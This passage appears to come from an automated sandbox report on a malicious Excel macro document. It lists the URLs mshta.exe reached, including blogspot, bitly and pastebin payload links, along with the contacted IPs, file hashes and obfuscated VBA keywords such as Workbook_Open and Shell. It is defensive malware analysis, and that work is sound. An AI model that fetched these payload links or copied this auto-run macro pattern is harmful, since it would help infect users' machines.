https://treffictesgn.blogspot.com/p/blog-page.htmlu	mshta.exe, 00000002.00000002.1660917204.00124000.00000004.sdmp	false	high
http://www.ya.com/favicon.ico	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	high
http://www.etmall.com.tw/favicon.ico	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	unknown
http://it.search.dada.net/favicon.ico	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	unknown
http://www.ascendercorp.com/	mshta.exe, 00000002.00000002.1664648911.02DE0000.00000002.sdmp	false	unknown
http://search.hanafos.com/favicon.ico	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	unknown
http://cgi.search.biglobe.ne.jp/favicon.ico	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	unknown
http://search.msn.co.jp/results.aspx?q=	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	unknown
http://buscar.ozu.es/	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	unknown
http://www.bitly.com/8U	mshta.exe, 00000002.00000002.1660917204.00124000.00000004.sdmp	false	high
https://pastebin.com/r	mshta.exe, 0000000D.00000002.1662132619.00301000.00000004.sdmp	false	high
http://ocsp.pki.goog/gsr202	mshta.exe, 00000002.00000002.1660917204.00124000.00000004.sdmp	false	unknown
https://pki.goog/repository/0	mshta.exe, 00000002.00000002.1660917204.00124000.00000004.sdmp	false	unknown
https://www.blogger.com/static/v1/widgets/3722393240-widgets.jsP	mshta.exe, 00000002.00000002.1663319141.01E83000.00000004.sdmp	false	high
http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	high
https://www.blogger.com/static/v1/widgets/3722393240-widgets.jsZ	mshta.exe, 00000002.00000002.1663493428.02198000.00000004.sdmp	false	high
http://www.ask.com/	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	high
http://www.google.it/	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	high
http://bitly.com/SexoPhone2.	mshta.exe, 00000002.00000002.1660917204.00124000.00000004.sdmp	false	high
http://search.auction.co.kr/	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	unknown
http://www.amazon.de/	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	high
http://sads.myspace.com/	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	high
http://www.pchome.com.tw/favicon.ico	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	unknown
http://browse.guardian.co.uk/favicon.ico	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	unknown
https://www.blogger.com/static/v1/widgets/3722393240-widgets.js/	mshta.exe, 00000002.00000003.1627822306.02192000.00000004.sdmp	false	high
http://crl.pki.goog/gsr2/gsr2.crl0?	mshta.exe, 00000002.00000002.1660917204.00124000.00000004.sdmp	false	unknown
http://google.pchome.com.tw/	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	unknown
http://list.taobao.com/browse/search_visual.htm?n=15&q=	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	high
http://www.rambler.ru/favicon.ico	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	high
http://pki.goog/gsr2/GTSGIAG3.crt0)	mshta.exe, 00000002.00000002.1660917204.00124000.00000004.sdmp	false	unknown
http://bitly.com/SexoPhone23	mshta.exe, 00000002.00000002.1660917204.00124000.00000004.sdmp	false	high
http://uk.search.yahoo.com/	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	high
http://www.ozu.es/favicon.ico	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	unknown
http://search.sify.com/	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	high
http://openimage.interpark.com/interpark.ico	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	high
http://search.yahoo.co.jp/favicon.ico	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	unknown
http://www.gmarket.co.kr/	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	unknown
http://search.nifty.com/	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	high
https://treffictesgn.blogspot.com/Uk	mshta.exe, 00000002.00000002.1661035852.00169000.00000004.sdmp	false	high
https://twitter.com/intent/tweet?text=	mshta.exe, 00000002.00000003.1626734499.0362E000.00000004.sdmp, 3722393240-widgets[1].js.2.dr	false	high
http://www.google.si/	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	high
http://www.soso.com/	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	high
http://D.K	mshta.exe, 00000002.00000003.1617348974.012EE000.00000004.sdmp	false	unknown
https://www.blogger.com/static/v1/widgets/3722393240-widgets.js735791605848944865&zx=34c390eb-f2fb-4	mshta.exe, 00000002.00000002.1661125486.00192000.00000004.sdmp, mshta.exe, 00000002.00000003.1638181476.00192000.00000004.sdmp	false	high
http://busca.orange.es/	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	high
http://cnweb.search.live.com/results.aspx?q=	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	high
http://auto.search.msn.com/response.asp?MT=	mshta.exe, 00000002.00000002.1666486840.05620000.00000008.sdmp	false	high
http://www.target.com/	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	high
https://treffictesgn.blogspot.com/p/7	mshta.exe, 00000002.00000003.1627864631.021A8000.00000004.sdmp	false	high
https://www.blogger.c	mshta.exe, 00000002.00000003.1636102968.035C8000.00000004.sdmp	false	unknown
http://search.orange.co.uk/favicon.ico	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	unknown
http://www.iask.com/	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	unknown
Https://treffictesgn.blogspot.com/p/blog-page.html	mshta.exe, 00000002.00000002.1661125486.00192000.00000004.sdmp	false	high
http://search.centrum.cz/favicon.ico	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	high
http://service2.bfast.com/	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	unknown
http://ariadna.elmundo.es/	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	high
https://resources.blogblog.com/img/widgets/icon_contactform_cross.gif	mshta.exe, 00000002.00000003.1626734499.0362E000.00000004.sdmp, 3722393240-widgets[1].js.2.dr	false	high
http://www.news.com.au/favicon.ico	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	unknown
http://www.cdiscount.com/	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	high
http://www.tiscali.it/favicon.ico	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	high
http://www.urwpp.de	mshta.exe, 00000002.00000002.1664648911.02DE0000.00000002.sdmp	false	unknown
https://www.blogger.com/static/v1/jsbin/864213505-ieretrofit.js.cssf	mshta.exe, 00000002.00000002.1663523281.021C2000.00000004.sdmp, mshta.exe, 00000002.00000003.1627864631.021A8000.00000004.sdmp	false	high
http://it.search.yahoo.com/	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	high
http://www.ceneo.pl/favicon.ico	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	high
http://www.servicios.clarin.com/	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	high
http://search.daum.net/favicon.ico	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	high
http://www.kkbox.com.tw/	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	unknown
http://search.goo.ne.jp/favicon.ico	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	unknown
http://search.msn.com/results.aspx?q=	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	high
http://list.taobao.com/	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	high
http://www.taobao.com/favicon.ico	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	high
http://www.etmall.com.tw/	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	unknown
https://treffictesgn.blogspot1Lm1o	mshta.exe, 00000002.00000002.1665253576.035C1000.00000004.sdmp	false	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Country	ASN	ASN Name	Malicious
104.20.208.21	United States	13335	unknown	false
172.217.168.33	United States	15169	unknown	false
216.170.123.122	United States	36352	unknown	false
67.199.248.14	United States	395224	unknown	false

Static File Info

General
File type:	CDF V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Sep 15 01:00:00 2006, Last Saved Time/Date: Mon Mar 11 19:33:22 2019, Security: 0
Entropy (8bit):	6.530952519851771
TrID:	Microsoft Excel sheet (30009/1) 46.87% Microsoft Excel sheet (alternate) (24509/1) 38.28% Generic OLE2 / Multistream Compound File (8008/1) 12.51% Java Script embedded in Visual Basic Script (1500/0) 2.34%
File name:	Mcg4yE0diN.xls
File size:	171520
MD5:	8e0667574b207deba373680d58a83f2d
SHA1:	148ba5f3126bb8fecff3f20bdce51bf9f0600348
SHA256:	a2b0fefa95c38ff92a5b81547634bbdca8d15dfff37c782dce5171eaa77ad710
SHA512:	da77cb93f1f34d945810b4471cc273206a9602464abdde230013fb36c2d9d1a33173ea667649d908ec01b3a44ac516ccf9c7e90cdad2177cea80a07a59f22fc7
SSDEEP:	3072:mqZ+RwPONXoRjDhIcp0fDlaGGx+cL26nA8CrezrenbuDedxo1jcaz3zKXlHgW:bZ+RwPONXoRjDhIcp0fDlavx+W26nA80
File Content Preview:	........................>.......................................................b..............................................................................................................................................................................

File Icon


Icon Hash:	e4eea286a4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "Mcg4yE0diN.xls"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Excel
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Summary
Code Page:	1252
Author:
Last Saved By:
Create Time:	2006-09-16 00:00:00
Last Saved Time:	2019-03-12 19:33:22
Creating Application:	Microsoft Excel
Security:	0

Document Summary
Document Code Page:	1252
Thumbnail Scaling Desired:	False
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	786432

Streams with VBA

VBA File Name: Module1.bas, Stream Size: 921

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Module1
VBA File Name:	Module1.bas
Stream Size:	921
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . K . . . . . . . . . . . . q & / . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 bc 02 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff c3 02 00 00 4b 03 00 00 00 00 00 00 01 00 00 00 c8 71 26 2f 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
Attribute
VB_Name
asdasdcanscsk()

VBA Code
`Attribute VB_Name = "Module1" Sub asdasdcanscsk() End Sub`

VBA File Name: Sheet1.cls, Stream Size: 977

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet1
VBA File Name:	Sheet1.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q e G . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 c8 71 65 47 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived

VBA Code

Attribute VB_Name = "Sheet1"

Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

Attribute VB_GlobalNameSpace = False

Attribute VB_Creatable = False

Attribute VB_PredeclaredId = True

Attribute VB_Exposed = True

Attribute VB_TemplateDerived = False

Attribute VB_Customizable = True

VBA File Name: Sheet2.cls, Stream Size: 977

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet2
VBA File Name:	Sheet2.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q $ Z . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 c8 71 24 5a 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived

VBA Code

Attribute VB_Name = "Sheet2"

Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

Attribute VB_GlobalNameSpace = False

Attribute VB_Creatable = False

Attribute VB_PredeclaredId = True

Attribute VB_Exposed = True

Attribute VB_TemplateDerived = False

Attribute VB_Customizable = True

VBA File Name: Sheet3.cls, Stream Size: 977

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet3
VBA File Name:	Sheet3.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q x G . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 c8 71 78 47 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived

VBA Code

Attribute VB_Name = "Sheet3"

Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

Attribute VB_GlobalNameSpace = False

Attribute VB_Creatable = False

Attribute VB_PredeclaredId = True

Attribute VB_Exposed = True

Attribute VB_TemplateDerived = False

Attribute VB_Customizable = True

VBA File Name: ThisWorkbook.cls, Stream Size: 71124

General
Stream Path:	_VBA_PROJECT_CUR/VBA/ThisWorkbook
VBA File Name:	ThisWorkbook.cls
Stream Size:	71124
Data ASCII:	. . . . . . . . . L . . . . . . . . . . . z . . . . . . . 0 . . . . . . . . . . . . q X . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . < . . . . . 6 . . 8 . . E J . . a / . . b ! . . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . z G . . . . H . . . . . p b R . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . z G . . . . H . . . . . p b R 6 . . 8 . . E J . . a / . . b ! . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 03 00 01 00 00 4c 0b 00 00 e4 00 00 00 10 02 00 00 7a 0b 00 00 88 0b 00 00 30 b1 00 00 00 00 00 00 01 00 00 00 c8 71 58 13 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 3c 00 ff ff 00 00 36 e3 1e 38 dd d6 45 4a a1 19 61 2f 8f c0 62 21 19 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
lgIKrxQZOupqotelsI:
RhaJruOrvJGpCc
TjcLuwQtxLIrEe
lVQFaQHUgONBnOlxL
MqGZtMGwcllkoaSaEQQ:
wySvAOZtGuhHedEmDq:
xyIgMqGmtM:
oRteuyAsRuZFtNEvJTCBpcCZlzhy:
KiRcieqGHdfoLtVmSZApUQQPUFyFkKw
CBppQZlNhMkCOCAuMJgP
KSfHbGewVwVP
TvflFNChddchSYgvXW
YorumKoSCynH
KSfHbGewVwVP:
"SQZQqEx"
"GkOujDtkMQF"
ZKOodaTmjGcAGCNRg:
PMYbqLMVgbETnGaUJ
COOeildBQJtbeybftpZm:
QoYiokwMcjl:
Long,
uzNYsFtfGdcDlCptStE:
BVMDQbKJxjKhtHpGsw:
OpLYnTlYcB:
gYwaECkZtkoyihUUvEQt:
ajeHQqKdYMtBCAFqkrU
IFcyQOKQoCYLU
qiHVOzhjDglyv:
IaLPpPbUnk:
isPKopVqvDtZiihmI
nTbtBrQRSQVGAHlMxNRU
VFPVReuvQSczhJa
OsubvAIyennmqNUcGSS
TQnJiokvzNjkuDy
"idRmdTsba"
FeYBDkqJRHnijhQelBccrikcBe:
mwffRStCOrKpNgsgdQpm:
JpkljoZSaDfPgkneDgL
uEnnaaBJQyS:
mnlqbipFggwmoFiMKshBsjwH
VjiyCEwVldNvx:
hQbhdpFGcenKrUlRY
LwsgAriwGpo
CxbdJPjrgLH
"uNsQjvjga"
False
JYFQIMnbYRkiEay
AzPFIAZChf:
DIzYhzYcE
OYYVbyFMrDD:
LvdgAdhvFbobNpLJmTl:
DALcqAJhbFHntNVLql
kGflhsvKghrAvZoHcu
RduIeRczuYZFafndIRRQ:
AmCFIAZChQ
fqZYLLnvHkDjGZlZQQj:
"LvFLTlzHIRp"
hSjmphFjNxtiCtkx
QnuBgtsILOGfunQFHc
nQSzTZhQCLLJOm:
xGeLoElrKSHnjj:
"ylSNrtZ"
JpkljoZSaDfPgkneDgL:
MgodIEEDItmtYykA:
"qHrtC"
chRKRwJIZcQvKDnVYsUan
PfildCfKtpeoftEmmZ
erSmRqHTHFzROlUgmitKvwFdKoDkqJ
VCIckZEAAzDpvCTutJz
"SpZkqmxOPl"
Len(PdumDifjc)
EhLJrgArivG:
xSrxtFIQsu
UCTFJjJUOheAQvjvMbwktQLprY
GurlDAYHRYTgwx
"CHEPh"
kdkOpbruxpNrVFBqK
OFyJTDCppRZlOhNkDP:
JLDdFkUPEZPGTfNM:
"xQmfOwy"
QaRqFyiPSnPTieNbAAc
qRbnOjNmEPEBv:
UCTFJjJUOheAQvjvMbwktQLprY:
KHBTRoYiokwMNjluRzds
EktusxUbiMaZpsvnMb:
MoZptvnMpTE
qwPYMsoonrdjrHihxnq
ovammBFIAZoQyBVyCQNwJj:
hisPwaqVdvDtZTUSYJ:
CLVQtJcwPJzfoonsdV
DLYATzQpOp
whbiLnYosvmLoTDzn
hwADvTjcLtwQtxL
rfAqhvFoobNoKYTlQbApmgyvRo
ediSahxYYn:
DiGYkZVPifCm
wQtyLVrEseFcbC
rpRzQCGgGRLebyTslhs:
xudqPPrzLoHndCdoiAkGqBGDOguCD:
JOcZHUuuVeq
OkmvFAetLgztjOY:
lMViJeIhzKzwqIFd
ediSahxYYn
UuUgarpMhGutLZuirQ
OewQkeTzIJHMqxcpoEHKCcqjTBDAFSdyLzlMjiJrQIMmMYR
BVLCQbJJwxYhtVpTsKQ
LtwQtxLVrE:
MqGZtMGwcllkoaSaEQQ
wHBTCZITaVhyNUQgDyce
hSjmphFjNxtiCtkx:
QpVzOvBUdSytusxib:
xIapKxHfaDFlFLSoxywBZfmQedtwzrQf
mgyvSoMSObesNZjeGQpJdQMsBBAFqjq
MlOsqZNiYPdnWWJJks:
qwPYMsoonrdjrHihx:
VFQVSduyRSbAgKZGMf:
tQLprYexFvbV
FKwCJbBAQGJBaDigN
CAuMJgCbhdorGcdnwrkDYqlaFOPNSDxEivuKOR:
pFwhQSmPUheNaAAbjv
vFbobNpLJmTQbAbmgyvSoME
glVdkAbbqhjbAdH
SgubtfjIxuoGDawUb
NrGntMUKqlm
jzprjIlPNwkFmAKttggHPdEYDc:
CZYzhylpOp:
TuFzRAYHRYTgwL:
rQSSRVHNUmMLcRUMlO
BVMDQbKJxjKhtHpGsw
LnpWqyEtZiihmJQXCP
QbApmgyvSoMS
RMqsZfyGvbQQVb:
"KYLx"
litKZhirPKn
YuepuqCTiqrAZ
QsuDNIlBToHBrQggfkU
xkKhgIpHtxQxICURo:
mtJkjzpskIm
VB_Exposed
HUuuVerSmRqHiITNgOlU
wQfREfBAdJbNRrRd
VnzolfxuQALRNZq:
IeAZebmpFabkupTiCV
HZnIwGeZCDkEJR
Integer)
yvofgTHeW
OFTeMMzmMjwKsJvzZNKE
phGUNygiCfkx:
gkJxvpHEbxVcYj
utJzCuSwbZGvPFwKUDD
euJfSczuYaGbgoeJRSQV
ttTdpRlQoGSGDxPNkT
trwhovLnmCsumL
URoYjolwNOkluSzdntMUJpllkoaSaEfQ
LkqmyBPlnwGBe:
OpLYnTlYcB
JgtHpGswVKH
rrefFObCQBasDspjB:
Len(yvofgTHeW)
fpYYKxYuHVDUGKkZVPi:
GprLotGDmzZZAIVxRwUm:
"zUmitKZ"
LtwQtxLVrE
BVMDQbJJxxYhtVpUsK:
"QVGzGlLxNTLlNsdYMh"
BBAFcjqUihxAD
jssryhahMYYnrumLaT
SgHbGfwIwuoGDaJUb
TSjnphGVNygiCfkxI
tKNQIgKoYUJdUKYiRR
"ypDNwwjV"
USXJPWnONdTWOmQusa
fKSTRQIBImzyO:
QxPBFfFQKdawS
UqOUQdguQRblgJZ:
dqePrNMoVnZdDepjB:
OwlFwnAKtthhHQdFZEc
tbeybftDZmZLmIHkR
MlOsqZNiYPdnWWJJks
ajeHQqKdYMtBCAFqkrU:
uMJgCbSObrGcPZw
cdbgDJQvIHYceVvKCnU
mHvEcQACjDIQFmuvtyVd:
COOeildBQJtbeybftpZm
bmpFablupTiCWojYFN
VhbtdzjuzvHZnv
wOyUEPVRduIQRczu:
IjsEhAgDVvVhbtdzj
QNkGfQSfvKgTdAv
vvKADvUxcaHwQHyLVFEs
iGYkYVPifBlwCyJb:
OiNmDeDOIbKh:
FimAxgtSSuCO:
ANKtGggHQdEZDc:
izAVQhElOeKRksiNIJHM
nyhgTTvDPs:
RgBDMQRuKdxQKAgppo
lNsdZMiYOdnVVIvVsF:
ChutJMPHgvoYGI
iPtIpvOQLsnnmrcUc:
VB_GlobalNameSpace
EUZbSsUzkgTpfVkuddP
mphFUNxfiCf
QcMFMrEDTQaRqFyiQSnP:
aFevVvGASCZITaVhyM
"DbhpSg"
tbeybftDZmZLmIHkR:
LjEdURduIeRbzuQZFa
SDwDiJuKOQIiKpaUJe
KxBbOMGZVsOntp
igODXOFScMLaiuXqWt:
BYwCyJNcxzI:
ONeTQOnQvtbPkQfpYYKKmuH:
xFvbkkinKRZDP
hQbhdpFGcenKrUlRY:
JplljoaSaEfQgknfDgL
DENmSwLsyRaPvqr
KrUkQQqyoTOP:
GurlDAYHRYTgwx:
vzBtSiaKsuOrwKG
xidRmdThrbaNzbxJYFQ:
aaptvnNcVFmpKmqFPk
pCMvvjUwSftbsei:
AilFimAKgtgStPOrZqc
SEIiWTNfcAVtAyILZu
xNOkmvSzdtagzHwc
oAdwcAReRPJZvfqwsDUVr:
OrICIbjZFABNSDyDhI
lmkpahoEffuln
rOhthfZroKuFKHSklG
vGQLoEWqKEtZiihmXQ:
OuDECHfltQ
eFcoCkBnrQFCw:
vxekDLAgccbgQQfvVUl
Variant
sQKoqQdwEuaU
AcyKZGYJNncZSliFbz:
owIlEkHazalfxhDnyD
VrPIEPhvQEOmhKL:
VhbtdzjuzvHZnv:
YSwyfzEMCiqrpuRZgJ
VB_Customizable
LoFlrLTInjjimYRYDd:
HUuuVeqSmRqHhHSMfOlU:
ONeTVNnPusbO:
vFoobNpLYmT
UyAhnGODjffejTb
eQrNMpVnaeDepjByU
ANKtGggHQdEZDc
rQQsANpJoM:
dTtuswjpvNonEtvnNp:
SQznIypDNwwjj
aQfpYYKKmuHj
vxekDLAgccbgQQfvVUl:
wTAeuahAHxdYZQcN
MhAukPZZYdNGNs:
MoZptvnMpTE:
jssryhahMYYnrumLaT:
cdbgDJQvIHYceVvKCnU:
QxssrwhahL:
aRqTyieSndTisbbNAcyK
lBEHzYngQyAU:
TqMlrnyCQmoxGBfvNiBv:
BhpqotfYfJVUlpsjIY:
pOCAuMJgCbhq
rTzjfToeUjtccOBcyLa:
cTsHAkRUpRVkuPdPCezy
LdrzAJicFHouNVL
yRphepHVqenMGjlSmr
SgTFhDCeLdOStSf:
SQznIypDNwwjj:
HnijhmQPQBcNehkcBeI
rpRzQCGgGRLebyTslhs
"jpIQGmh"
xudqPPrzLoHndCdoiAkGqBGDOguCD
EAMdsNBKidGIpIOQLr
SekgrIJfgqNu
ADGyQmfPxzTw:
LRaOuDECHflsQ:
"zVzwHKa"
IpJOQMsBBAFcjqUih
MRaPvEEDIgmtYl:
VFQVSduyRSbAgKZGMf
DQbKJxxZhtVpUsKQKI
occDLYATzQpBphzwSCNSPbstO
nMpTRzoIzqDNxwkkL
UHiERgMfQUugaspLiGMITQ:
"ThisWorkbook"
giCfkyudqPQrAMo:
knfDhLvrgAq:
bhAIyeZaYdNHOs:
rQQsANpJoM
JgtHpGswVKH:
IaLPpPbUnk
Shell
Resume
owIlEkHazalfxhDnyD:
mRqHiHSMfOlUgmitKZh
vFoobNpLYmT:
"PHDPgQENlg"
ciepGUdeoLGklRZrzpU
gjbzcHrncw:
rDRzQCGhURLebyTsyuGYtvEOJnCUpICsYhhg:
rOhthfZroKuFKHSklG:
"oDtw"
fQwZDBjYsj:
LXRigDYvplvOclyTOr:
RaqQPgVZQpSxvdRmdS:
lxxNQTLkzscJMhJNc
tDJFRijEGPnUxNuAT
xidRmdThrbaNzbxJYFQ
LjEdVRduIeRczuYZFa:
ZwdGQDJdlaFBBAEqjq:
izAVQhElOeKRksiNIJHM:
vGQLoEWqKEtZiihmXQ
IpJOQMsBBAFcjqUih:
mukPKLJOzszeEqGKMEe:
IeAZebmpFabkupTiCV:
YrXyNnOZTlUqalrnQf
URdgvQRblgJZsLfaOu:
NGqZbvYdqAVjQIk:
"JQySxVNozt"
DiGYkZVPifCm:
BAEqjqUhhwADvTj:
fjmeCRKucfzcguqanM
fndIRRQUsz:
MnbZSliEazEBMPfAB
AyDpipTugvzCuSw
ejgrIJfgpNuYnTatBrQR
BnrRrCwOLjEd
MuLxBcCNHaQt:
PgvQENlgJLsLRaOu
lVQFaQHUgONBnOlxL:
Workbook_Open()
TmymkewtPzKPMYqLMVubETAGaiY
"QfUAvvu"
OwlFwnAKtthhHQdFZEc:
"pmIfDvrDTjsBZTxzg"
eVuYCAiQrh:
BrQfgejGNUzLLb
YorumKoSCynH:
drBkkQJlGTiP
uUgascyityuGYmuvEdQA
afspYlKKmuHjCiG:
